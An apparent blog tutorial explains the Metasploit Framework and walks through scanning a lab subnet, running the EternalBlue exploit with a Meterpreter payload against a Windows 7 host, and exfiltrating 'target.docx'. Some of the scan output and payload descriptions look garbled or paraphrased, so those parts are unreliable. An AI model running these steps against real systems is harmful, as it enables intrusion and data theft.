HealthyByte: Bridge That Gap

View Original

What is the Metasploit Framework and how is it used?

The Metasploit Framework is a potent tool that cybercriminals can use as well as ethical hackers to probe systematic vulnerabilities on networks, systems, and servers. It is an open-source framework that is easily customizable and used in most operating systems. The Metasploit framework is licensed by Rapid7 since 2009 and has become the go-to framework for exploit development and mitigation tactics. The software is popular with hackers and widely available, which reinforces the need for security professionals to become familiar with the framework even if they don’t use it.

Metasploit now includes more than 2000+ exploits organized over 25 platforms, including Android, PHP, Python, Java, Cisco, and more. The framework also carries more than 500+ payloads, some of which include:

  • Command shell payloads that enable users to run scripts or random commands against a host.

  • Dynamic payloads that allow testers to generate unique payloads to evade antivirus software.

  • Meterpreter payloads allow users to abduct device monitors using VMC and take over sessions or upload and download files.

  • Static payloads that enable port forwarding and communications between networks.


An example of the working with the Metasploit-Framework:

Exploiting a Windows 7 machine using Metasploit.

Strategy: Compromise a Windows 7 machine in order to locate and exfiltrate ‘target.docx’ file.

Tactics:

  1. Performing a network scan.

  2. Analyzing the scan output in order to identify the Windows 7 machine.

  3. Gain access to the machine using the ‘EternalBlue’ exploit.

  4. Locate the target file on the machine.

  5. Exfiltrate the file.

Operationally:

  • Run nmap in order to identify Windows 7.

    sudo nmap 192.168.42.2-110

  • Identified the active IP addresses.

    192.168.42.34

    Host is up (0.031s latency).

    Linux unconfirmed

    Web server unconfirmed

    192.168.42.42

    Windows 7 Professional confirmed

    Workstation unconfirmed

    192.168.42.49

    Host is up (0.036s latency).

    All 1000 scanned ports on 192.168.42.49 are filtered

    Linux unconfirmed

    Workstation unconfirmed

    192.168.42.59

    Linux unconfirmed

    Workstation unconfirmed

    192.168.42.63

    Windows Server 2008R2 Standard SP1 confirmed

    Unconfigured unconfirmed

    192.168.42.100

    Windows server 2016 confirmed

    AD Server unconfirmed

  • Gain Access using eternalblue exploit.

    msf5 auxiliary(scanner/smb/smb_version) > use

    exploit/windows/smb/ms17_010_eternalblue

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.42.42

    RHOST => 192.168.42.42

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload

    windows/x64/meterpreter/bind_tcp

    payload => windows/x64/meterpreter/bind_tcp

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

    meterpreter exploit windows/smb/ms17_010_eternalblue against

    RHOST 192.168.42.42 with payload windows/x64/meterpreter/bind_tcp

    exploitation was successful & access was gained.

  • Locate target file on machine

    meterpreter search -f target.docx

  • Exfiltrate the file

    meterpreter download C:\\Users\\User\\Desktop\target.docx

The file was downloaded successfully.